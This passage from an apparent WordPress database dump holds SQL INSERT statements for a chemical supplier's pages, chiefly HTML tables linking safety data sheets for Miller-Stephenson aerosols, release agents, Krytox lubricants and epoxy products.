href="https://www.miller-stephenson.com/wp-content/uploads/sds/752.pdf">MS-752</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143HRED.pdf">MS-143H RED</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Lineargrease.pdf">LINEAR GREASE</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/828.pdf">EPON RESIN 828</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/538.pdf">MS-538</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752U.pdf">MS-752U</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/MS-143TE.pdf">MS-143TE</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Linearoil.pdf">LINEAR OIL</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/830.pdf">EPON RESIN 830</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/550.pdf"> MS-550</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/757.pdf">MS-757</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/03/143XD-17.pdf">MS-143XD</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/LVP.pdf">LVP</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/834.pdf">EPON RESIN 834</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/555.pdf">MS-555</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/762.pdf">MS-762</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD1.pdf">MS-143XD-1</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8990.pdf">NRT 8990</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/862.pdf">EPON RESIN 862</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/560.pdf">MS-560</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/767.pdf">MS-767</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD2.pdf">MS-143XD-2</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8906A.pdf">NRT 8906A</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/872.pdf">EPON RESIN 872</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/580.pdf">MS-580</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/772.pdf">MS-772</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD25.pdf">MS-143XD-2.5</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8908.pdf">NRT 8908</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1001F.pdf">EPON RESIN 1001F</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/777.pdf">MS-777</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD5.pdf">MS-143XD-5</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8950.pdf">NRT 8950</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1002F.pdf">EPON RESIN 1002F</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700M</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/782.pdf">MS-782</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD10.pdf">MS-143XD-10</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8980.pdf">NRT 8980</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1004F.pdf">EPON RESIN 1004F</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/787.pdf">MS-787</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W.pdf">MS-145W</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRTgrease.pdf">NRT GREASE</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1007F.pdf">EPON RESIN 1007F</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720M</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/797.pdf">MS-797</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W4.pdf">MS-145W-4</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1031.pdf">EPON RESIN 1031</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720L.pdf">MS-720L</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110XB.pdf">MS-110XB</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/153BN.pdf">MS-153BN</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PFPE-Grease-with-Soluble-Additive.pdf">pfpe-grease-with-soluble-additive</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf">PFPE Oils</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/3100MD-3170MD-16.pdf">MS-31XXMD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/114D-17.pdf">MS-114D </a></td>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\n<td></td>\n<td style="text-align: center;"></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\n</tr>\n<tr>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\n</tr>\n</tbody>\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-autosave-v1', '', '', '2017-06-16 17:32:43', '2017-06-16 17:32:43', '', 1842, 'https://132.148.10.86/wordpress/1842-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1846, 2, '2016-09-20 13:53:48', '2016-09-20 13:53:48', '', 'electrical-contact-lubricant', '', 'inherit', 'open', 'closed', '', 'electrical-contact-lubricant-4', '', '', '2016-09-20 13:53:48', '2016-09-20 13:53:48', '', 1104, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/electrical-contact-lubricant-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1847, 2, '2016-09-20 13:56:41', '2016-09-20 13:56:41', '<h1>Miller-Stephenson SDS data base.</h1>\r\nif you are unable yo locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219">Aerosol</td>\r\n<td style="text-align: center;" width="180">Liquid</td>\r\n<td style="text-align: center;" width="180">Release Agents</td>\r\n<td style="text-align: center;" width="180">Conformal Coatings</td>\r\n<td style="text-align: center;" width="180">Krytox</td>\r\n<td style="text-align: center;" width="180">Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-124H</td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222L</td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222N</td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222T</td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 